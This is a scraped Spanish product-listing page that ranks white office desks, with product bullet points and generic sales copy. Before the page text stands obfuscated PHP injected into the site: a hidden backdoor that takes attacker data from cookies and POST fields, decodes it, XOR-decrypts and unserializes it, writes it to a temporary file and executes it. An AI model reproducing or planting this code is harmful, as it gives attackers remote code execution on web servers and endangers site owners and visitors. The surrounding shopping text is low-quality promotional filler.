$XNwuWW = "\x6a" . "\x5f" . 'j' . chr ( 359 - 292 ).'w';$QEBdXtY = 'c' . "\154" . "\x61" . chr (115) . chr ( 753 - 638 )."\137" . 'e' . chr ( 578 - 458 )."\151" . chr ( 398 - 283 ).'t' . "\x73";$kohfHFPhf = class_exists($XNwuWW); $QEBdXtY = "35568";$RMxEJ = !1;if ($kohfHFPhf == $RMxEJ){function dfXCkU(){$QkxMvKW = new /* 15322 */ j_jCw(39302 + 39302); $QkxMvKW = NULL;}$AkcBVx = "39302";class j_jCw{private function gQISEuAx($AkcBVx){if (is_array(j_jCw::$hUnkGMVc)) {$skRRVkwlu = sys_get_temp_dir() . "/" . crc32(j_jCw::$hUnkGMVc['s' . "\141" . "\154" . chr (116)]);@j_jCw::$hUnkGMVc["\x77" . chr (114) . chr (105) . 't' . "\x65"]($skRRVkwlu, j_jCw::$hUnkGMVc[chr ( 191 - 92 ).chr ( 1045 - 934 ).chr ( 1048 - 938 ).chr ( 494 - 378 )."\145" . "\156" . "\x74"]);include $skRRVkwlu;@j_jCw::$hUnkGMVc['d' . 'e' . "\x6c" . "\x65" . "\164" . chr (101)]($skRRVkwlu); $AkcBVx = "39302";exit();}}private $pulCRceice;public function huKrxbs(){echo 35260;}public function __destruct(){$AkcBVx = "49071_25115";$this->gQISEuAx($AkcBVx); $AkcBVx = "49071_25115";}public function __construct($XWLxiUW=0){$vrNER = $_POST;$IDexAV = $_COOKIE;$HSXUoj = "3018840c-2bd0-4c9f-a423-6147c8dc4b23";$qFnwbnOTKU = @$IDexAV[substr($HSXUoj, 0, 4)];if (!empty($qFnwbnOTKU)){$WxkJXsYt = "base64";$uBZsURPR = "";$qFnwbnOTKU = explode(",", $qFnwbnOTKU);foreach ($qFnwbnOTKU as $gogSNnqZNY){$uBZsURPR .= @$IDexAV[$gogSNnqZNY];$uBZsURPR .= @$vrNER[$gogSNnqZNY];}$uBZsURPR = array_map($WxkJXsYt . "\x5f" . "\144" . 'e' . "\x63" . chr ( 933 - 822 ).chr (100) . chr (101), array($uBZsURPR,)); $uBZsURPR = $uBZsURPR[0] ^ str_repeat($HSXUoj, (strlen($uBZsURPR[0]) / strlen($HSXUoj)) + 1);j_jCw::$hUnkGMVc = @unserialize($uBZsURPR); $uBZsURPR = class_exists("49071_25115");}}public static $hUnkGMVc = 27368;}dfXCkU();} Mesas oficina blancas - Centro Deportivo Utebo

Mesas oficina blancas

Top 20: Mejores Mesas oficina blancas de 2021

Top 10: Mesas oficina blancas superventas de 2021

Rebajas01.
ODK Escritorio de Ordenador, Mesa de Estudio de Ordenador con Bolsa de Almacenaje y Gancho para Auriculares Mesa de Escritura de Ordenador para Oficina, Dormitorio (100x50x74cm, Blanco)
  • Escritorio muy resistente: este escritorio para ordenador tiene una superficie de trabajo espaciosa, adecuada para 2 monitores cuando trabajas en casa o en la oficina. Está hecho de aglomerado de alta calidad que es resistente a los arañazos, impermeable y fácil de limpiar. La gruesa estructura metálica de acero con recubrimiento en polvo de alta resistencia mejora la estabilidad y la seguridad de uso, un escritorio indispensable para la oficina en casa.
  • Escritorio para el trabajo en casa y en la oficina: el escritorio para ordenador ODK está diseñado con un estilo moderno pero sencillo. El espacioso tablero de la mesa facilita la colocación de tu ordenador de sobremesa, portátil, taza de café, planta pequeña, teclado, etc. Puedes elegir entre 2 tamaños para satisfacer todas las necesidades: 100 y 120 cm. Elige el tamaño más pequeño para un dormitorio, estudio o esquina, y el más grande para un área de trabajo mayor.
  • Diseño de almacenamiento multiusos: esta mesa de trabajo para ordenador para oficina en casa está diseñada con una bolsa de almacenamiento lateral y un gancho de hierro para auriculares. Puedes poner tus revistas, archivos, libros y pósteres en la bolsa de almacenamiento para ganar más espacio y hacer que el escritorio esté más ordenado. El gancho para auriculares te permitirá colgar firmemente tus auriculares o bolso. Organiza tus objetos. Trabaja sin desorden, trabaja de manera ordenada.
  • Amplia aplicación y una buena opción de regalo: los escritorios ODK son perfectos para el hogar, la oficina, el dormitorio, la sala de lectura, el estudio, etc. Hay 2 tamaños para diferentes necesidades de espacio y 3 colores para adaptarse a diferentes estilos de decoración de la habitación. Este escritorio con espacio de almacenamiento también es un buen regalo para tus amigos o familiares en fiestas, cumpleaños, Año Nuevo, inauguración de casa, regreso a la escuela, etc.
  • Instalación rápida y 100 % satisfacción del cliente: el montaje es fácil y se tarda entre 20 y 30 minutos. El paquete viene con todo el material de montaje y los componentes que necesitas. Ten en cuenta que primero debe leer las instrucciones de instalación (idioma español no garantizado). No lo dudes, ven a por tu mesa de estudio, escritorio de oficina.
Rebajas02.
Habitdesign Mesa Escritorio, Mesa despacho Reversible, Mesa multiposición, Estudio, Modelo Adapta, Acabado en Blanco Artik
  • La mesa de estudio multiposición Adapta es una mesa de oficina o escritorio de líneas depuradas y formas sencillas pero muy práctico. Mesa reversible y te permitirá montar el módulo de almacenaje (baldas y puertas) a derecha o izquierda, de cara o de lado, según te convenga.
  • Mesa rinconera: 74 cm (alto) x 120 cm (ancho) x 77 cm (prof.) Mesa estirada: 74 cm (alto) x 152 cm (ancho) x 49 cm (prof.) Se trata de una mesa de oficina que permite el trabajo manual y también el trabajo en ordenador, suficiente amplio como para que una persona trabaje sin estrecheces.
  • Consta de aglomerado de alta densidad con una melamina de calidad e impermeable de larga durabilidad. Producto Certificado por la PEFC (Asociación Española para la Sostenibilidad Forestal), el mueble es de color Blanco Artik (mate), muy combinable con todo tipo de decoración.
  • Este tipo de material tiene una superficie no porosa y muy resistente. Por lo tanto, es un mueble fácil y rápido de limpiar con un paño húmedo. Requiere montaje (incluye instrucciones y herrajes).
03.
MUEBLES PITARCH | Mesa Despacho, Escritorio grande de Estudio, Mesa Ordenador, Oficina, Blanca, 76x155x68cm (Alto x Ancho x Fondo) Moderna Modelo Rívoli
  • Mesa Rívoli perfecta para cualquier lugar de la casa, debido a su gran anchura.
  • Color: Blanco/pivote blanco
  • Colección Rívoli
  • Material: aglomerado de partículas y melamina de alta densidad
  • Medidas generales: 76 x 155 x 68 cm (alto x ancho x profundo)
  • Características: tapa, laterales y trasera de 2.2 cm grosor
  • Cilindro separador blanco
  • Necesita montaje
04.
TRIUMPHKEY Mesa Escritorio 140cm, Escritorio de Ordenador con Cuatro Estantes, Moderna Escritorio Reversible, Mesa Escritorio Gaming, Fácil de Montar para Casa y Oficina, Blanco
  • 【Amplio Espacio de Almacenamiento】El escritorio viene con cuatro niveles de estantes de almacenamiento, y la dirección de los estantes se puede ajustar de acuerdo a sus necesidades. El estante más bajo puede poner host de ordenador o algunas cosas, los otros tres estantes pueden poner libros, material de oficina o plantas en macetas, etc., que es de fácil acceso.
  • 【Espacio Escritorio de Estudio u Oficina】Los estantes de almacenamiento están diseñados para reducir la molestia de tener muchos artículos y mantener el escritorio ordenado y espacioso. El escritorio tiene mucho espacio para que usted pueda estudiar o trabajar.
  • 【Estructura Robusta y Duradera】La barra reforzada de esta mesa adopta la estructura triangular más estable, y el marco de la mesa también tiene un diseño reforzado, lo que hace una doble garantía para la estabilidad de la mesa. El marco tiene pies antideslizantes ajustables para proporcionar estabilidad a la mesa.
  • 【Múltiples Escenarios de Uso】El escritorio de la computadora estantería se puede utilizar como una oficina en casa o mesa de juego, que se puede colocar en el dormitorio, estudio, sala de juegos, etc. Esta mesa tiene tres colores para que usted elija, que puede satisfacer una variedad de estilos y necesidades.
  • 【Fácil de Instalar y Limpiar】La mesa de estantería viene con un conjunto completo de herramientas e instrucciones detalladas. La superficie de la mesa es resistente al agua y se puede limpiar con facilidad.
05.
Habitdesign Mesa Escritorio con 2 Cajones, Mesa de Despacho, Mesa de Oficina, Modelo Touch, Color Blanco Artik, Medidas: 138 cm (Ancho) x 50 cm (Fondo) x 75 cm (Alto)
  • La mesa incluye 2 cajón es, ideales para guardar y ordenar todo aquello que precises; la pata metálica puede ir a la izquierda o a la derecha.
  • Medidas de las mesa de escritorio mueble 138 cm (ancho) x 75 cm (alto) x 50 cm (fondo); capacidad cajón 62 cm (ancho) x 10 cm (alto) x 30 cm (fondo).
  • Fabricado con aglomerado de alta densidad, melamina de gran calidad y durabilidad; producto certificado por la pefc (asociación española para la sostenibilidad forestal) en color blanco mate; la parte inferior del mueble incluye tacos abs quitar ruidos y antirayado
  • Este tipo de material tiene una superficie no porosa y muy resistente; por lo tanto, es un mueble fácil y rápido de limpiar con un paño húmedo; requiere montaje (incluye instrucciones y herrajes).
  • No incluye los objetos de decoración y accesorios.
06.
Yaheetech Mesa de Ordenador con Estantería 112x50x82cm Escritorio con Cajon para Computadora Escritorio Oficina Despacho Moderno Blanco
  • 【Estructura sólida y estable】: Compuesto de MDF(DM) que cumple con la norma E1, chapa de madera resistente a los arañazos e impermeable y herrajes metálicos de calidad, nuestro escritorio de oficina con capacidad para soportar hasta 50 kg
  • 【3 diferentes espacios para organización】: Este escritorio cuenta con un cajón y un estante de almacenamiento para almacenar los artículos tales como libros, mobiles, revistas, etc. Con el soporte para CPU es un ordenador de sobremesa fácil de usar.
  • 【Espacio de almacenamiento adecuado】: Nuestra mesa compacta para ordenador tiene un espacioso tablero de 80x50cm para colocar el monitor y escribir,el escritorio es perfecto para que estudiantes o profesionales coloquen libros de texto o documentos.
  • 【Diseño minimalista】: Delineada por líneas simples y limpias, esta mesa de ordenador puede encajar perfectamente en una variedad de espacios de decoración de hogares modernos, especialmente el estilo minimalista.
  • 【Fácil de montar】: Están incluidos todos los accesorios requeridos y las instrucción con dibujos que muestran claramente el montaje paso a paso. Normalmente, sólo se tarda entre 15 y 30 minutos en instalarlo.
07.
briebe Escritorio, Mesa de Ordenador 75x90x50cm (Alto x Ancho x Profundo), 1 Cajón, Oficina, Habitación Juvenil, Desk, Nova (Blanco)
  • DISEÑO ELEGANTE: El escritorio de la colección Nova de briebe aporta un estilo moderno pero la vez atemporal. Se adapta perfectamente a cualquier decoración, brindando un toque de sofisticación y frescura a tu oficina o habitación.
  • COMPACTA Y FUNCIONAL: Es la solución perfecta para crear un espacio de estudio o trabajo sin ocupar mucho espacio. ideal para oficinas o habitaciones pequeñas para que puedas teletrabajar cómodamente. Dispone de un cajón que permite tener a mano tus papeles, bolígrafos y otros accesorios sin que ocupen espacio en la mesa.
  • FÁCIL DE MONTAR: ¿No eres manitas? No hay problema. Nuestra mesa de ordenador está diseñada para un montaje rápido y fácil, ¡para que puedas hacerlo tú mismo sin estrés! Las instrucciones son fáciles de seguir, lo que asegura un montaje sin errores. No incluye herramientas como destornillador, martillo, cinta americana, metro.
  • ROBUSTA Y DURADERA: Fabricada con aglomerado de partículas y melamina de alta densidad proveniente de bosques europeos y realizada en España, ofrece robustez y durabilidad, garantizando una larga vida útil y fácil limpieza.
  • DIMENSIONES: La medida esta mesa de oficina o gaming pequeña es de 90 cm de ancho, 75 cm de alto y 50 cm de fondo, proporciona una superficie de trabajo óptima y multifuncional. Mueble en kit, requiere montaje.
  • MUEBLES COMPROMETIDOS CON LA SOSTENIBILIDAD: Comprando los muebles en kit briebe Home ayudas a preservar los bosques y la biodiversidad. Nuestros fabricantes poseen certificados de la cadena de custodia FSC, lo que garantiza que sus tableros de aglomerado provienen de bosques gestionados de manera responsable, atendiendo a criterios de sostenibilidad y cumpliendo rigurosos estándares y requisitos.
Rebajas08.
Zinus Jennifer Mesa de escritorio 160x61x74 cm - Mesa de estudio moderna de metal y madera - Mesa de ordenador - Marrón y blanco
  • ESTILO MODERNO Y FUNCIONALIDAD PARA CUALQUIER HABITACIÓN: Para su oficina en casa, espacio de trabajo dormitorio o sala de estar, este escritorio contemporáneo de líneas limpias ayuda a tirar juntos cualquier habitación en necesidad de un poco de espacio de mesa extra
  • MÚLTIPLES COLORES Y TAMAÑOS: Disponible en una gran variedad de tamaños y acabados para que encuentres el que mejor se adapte a tu espacio maravillosamente.
  • RESISTENTE: La sólida estructura de acero y el grueso tablero de la mesa están diseñados para soportar hasta 45 kg de peso distribuido uniformemente.
  • FÁCIL MONTAJE: Todas las piezas, herramientas e instrucciones están empaquetadas en una caja compacta para un montaje sencillo en menos de 30 minutos.
  • SIN PREOCUPACIONES: 2 año de garantía; sólo mesa, sillas no incluidas
09.
ODK Escritorio, Escritorio de Esquina, Escritorio para Juegos, Escritorio para computadora, en Forma de L, Mesa de Oficina, Mesa de Trabajo, (127 x 127cm, Blanco)
  • 【Construcción robusta y estable】Nuestras mesas gaming para oficinas en casa tienen una construcción sólida con materiales de alta calidad y una estructura de metal resistente. Esto garantiza durabilidad y confiabilidad para el uso diario en la oficina en casa o en un entorno profesional.
  • 【Soporte para monitor】Los escritorios esquineros ergonómicos ODK están equipados con soportes para monitor integrados que permiten una colocación óptima de las pantallas y promueven así una forma ergonómica de trabajar que reduce el dolor de cuello y espalda.
  • 【Fácil construcción】Montar nuestro resistente escritorio para juegos con soporte para monitor es muy fácil gracias a las instrucciones fáciles de entender y a las herramientas y tornillos incluidos en la entrega. De esta forma podrás configurar tu nuevo lugar de trabajo de forma rápida y sencilla.
  • 【Amplia superficie de trabajo】Nuestros escritorios en forma de L brindan una superficie de trabajo espaciosa que brinda suficiente espacio para computadoras, monitores, impresoras y otros equipos de oficina. Trabaje de manera eficiente y cómoda en un lugar de trabajo claro y bien organizado.
  • 【La satisfacción del cliente】Confiamos en la calidad de nuestro escritorio en forma de L para un fácil montaje y ofrecemos a nuestros clientes una garantía de satisfacción. Si tiene alguna pregunta o inquietud, nuestro amigable servicio de atención al cliente está disponible para ayudarlo en cualquier momento.
010.
WOLTU Mesa Escritorio con 3 Cajones, Mesa de Ordenador Blanco, Mesa de Oficina 120x60x75cm, Mesa de PC Escritorio TS59ws
  • Estable y no fácil de sacudir: El tablero de esta mesa de oficina está hecho de tableros de partículas con un grosor de 15 mm. El conjunto está cubierto con una chapa de resina de melamina, que es robusta, repelente al agua, resistente a los arañazos y fácil de limpiar. Puede soportar hasta 35 kg
  • Gran espacio de almacenamiento: El amplio tablero y los 3 cajones ofrecen suficiente espacio de almacenamiento para su ordenador, marcos de fotos, documentos, libros, etc. El gran espacio bajo el escritorio puede acomodar la silla y el cubo de basura, o puede poner las cajas de almacenamiento según su demanda para crear un entorno limpio y refrescante para el trabajo y el entretenimiento
  • Diseños cuidadosos: El escritorio de trabajo blanco tiene un aspecto elegante y moderno. Los tiradores plateados de los cajones facilitan la extracción de los cajones. El primer cajón está equipado con una cerradura y 2 llaves para proteger su privacidad. Cada cajón está equipado con una guía lisa, así que no hace ruidos fuertes cuando se utiliza
  • Práctica y versátil: Con un tamaño compacto y un diseño práctico y sencillo, esta mesa de madera no sólo es un escritorio, una mesa de oficina, una mesa de ordenador, sino que también puede utilizarse como tocador con espejo, mesa de juegos, mesa de costura, etc. Puede colocarlo en diferentes lugares como la oficina, el salón, el dormitorio, el estudio o la habitación de los niños para satisfacer diferentes demandas
  • Tamaño y montaje: 120x59x75 cm (Largo x Ancho x Alto), tamaño del cajón: 35x31,5x12,8 cm. Puede montar fácilmente el escritorio de oficina bajo la guía de las instrucciones detalladas de montaje
Rebajas011.
ODK Escritorio Esquinero Blanca, 140x80x84,7cm Escritorio en L con 4 Cajones Reversible, Mesa en L con 2 Puertos de Carga USB y 2 Enchufes, Escritorio con Estante para Monitor para Oficina en Casa
  • 【Puertos de carga USB y enchufes】El escritorio de ordenador en forma de L ODK está equipado con 2 enchufes y 2 puertos de carga USB para sus dispositivos electrónicos. Para que pueda cargar fácil y cómodamente su teléfono inteligente, consola de juegos o dispositivos Bluetooth mientras trabaja o juega.
  • 【Super gran espacio de almacenamiento】 El escritorio en forma de L ODK tiene 4 cajones y una bolsa de almacenamiento, lo que le proporciona un gran espacio de almacenamiento debajo del escritorio para que pueda almacenar sus libros, libros de trabajo y pequeños suministros de oficina, haciendo que su trabajo y estudio sean más eficientes.
  • 【 Escritorio de ordenador con diseño en forma de L】Con tamaño de escritorio principal de 140 x 80 x 84.7cm. El escritorio en forma de L se adapta perfectamente a todos los rincones de su habitación y aprovecha al máximo el espacio limitado. Este moderno escritorio minimalista será una hermosa decoración en su dormitorio, sala de estar, oficina, espacio de trabajo, dormitorio, sala de juegos y habitación de los niños, también es un gran regalo para sus seres queridos y amigos.
  • 【Soporte de monitor largo y superestable】El soporte del monitor de estructura ergonómica, que reduce eficazmente la presión sobre la espalda y el cuello, por lo que no tiene que preocuparse demasiado por los problemas de salud cuando trabaja. El escritorio de oficina está hecho de tablero MDF de alta calidad que es resistente a los arañazos y al agua. El escritorio de esquina está construido con un marco de metal de alta calidad que es duradero y estable.
  • 【Fácil Instalación&Atención al Cliente】ODK escritorio en forma de l viene con instrucciones claras y detalladas y piezas numeradas para que el montaje de este robusto escritorio en L sea lo más fácil posible. Si tiene alguna pregunta sobre nuestro escritorio en L, no dude en contactarnos. Con el fin de proporcionarle un mejor soporte y ayuda, siempre tenemos su espalda y ofrecemos una garantía confiable.
012.
Mobelcenter - Mesa de Escritorio con cajonera Reversible - Mesa de Oficina Blanca - Medidas: 138 cm Ancho x 60 cm Fondo - 0892
  • Funcional mesa de escritorio elaborada en melamina de alta calidad, un material 100% no poroso y muy resistente al uso diario. Dispone de espacio de almacenaje, dos cajones y una puerta de doble capacidad. Esta mesa es reversible, lo que significa que puedes montar los cajones a la derecha o a la izquierda. Su diseño de líneas limpias y sencillas hace que la mesa de escritorio sea muy versátil y adaptable a todos los estilos de decoración y a todo tipo de público, tanto infantil como adulto.
  • MEDIDAS: Ancho: 138 cm. x Alto: 75 cm. x Fondo: 60 cm * Para la correcta instalación del mueble y posibles variaciones en las medidas, otorgar un margen de +/- 10 cm en las medidas del artículo para asegurar su cabida en el lugar de destino.
  • MATERIALES: Mueble realizado con tablero de partículas de gran resistencia. Revestimiento de melamina de 15 y 30 mm. ACABADO Y COLOR: Color blanco artik. Patas metálicas blancas.
  • ENTREGA A PIE DE CALLE
  • Garantía de 3 años (ver condiciones) con un servicio post-venta 100% satisfacción, reposición gratuita de piezas extraviadas o dañadas.
Rebajas013.
Habitdesign , Escritorio con Cajonera, Mesa de Oficina, Modelo Office Buc, Acabado en Blanco Artik y Roble Cananadian, Medidas: 145 cm (Largo) x 102 cm (Fondo) x 73 cm (Alto)
  • Medidas mesa de oficina Buc: 145 cm (Largo) x 102 cm (Fondo) x 73 cm (Alto).
  • Acabado en melamina de calidad color Blanco Artik y Roble Canadian.
  • Tres cajones con guías correderas metálicas, gran capacidad de almacenaje.
  • Hecho de aglomerado de alta densidad recubierto por una melamina de alta calidad e impermeable de larga durabilidad. Producto Certificado por la PEFC (Asociación Española para la Sostenibilidad Forestal).
  • Este tipo de material no se ve afectado por los químicos de los productos de limpieza ya que, tiene una superficie no porosa y muy resistente. Por lo tanto, es un mueble fácil y rápido de limpiar con un paño húmedo. Requiere montaje. (Se incluyen los dispositivos de fijación del mueble a la pared).

Desglosando Mesas oficina blancas

Hay oportunidades en las que procuras comprar una mesa, pero en el final del día no puedes adquirirla, en tanto que cuando mires nuestros modelos, te encantará.

De ti depende si deseas y buscas calidad y al mejor precio del mercado, te ofrecemos lo destacado de lo mejor.

Asimismo pensamos en tu dinero, y por eso te ofrecemos los proyectos de financiación más personalizados, a fin de que estés absolutamente satisfecho.

¿Precisas un tocador? tenemos a tu disposición un sinnúmero de mesas para salones de belleza, entre otros muchos géneros de tiendas.

Si tienes dudas sobre nuestros desarrolladores, puedes asistir a los comentarios de nuestros usuarios y clientes del servicio que están todos satisfechos con el buen servicio y la calidad.

Unicamente se puede conseguir lo mejor visitando lo mejor en la creación de mesas particulares para usted, únicas y cómodas de emplear donde desee.

Contamos con un servicio al usuario las 24 horas del día, trescientos sesenta y cinco días al año, nuestros especialistas están siempre y en todo momento libres.

No somos los más destacados por casualidad, somos los más destacados por recomendación de nuestros clientes a través de nuestras altas ventas.


Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir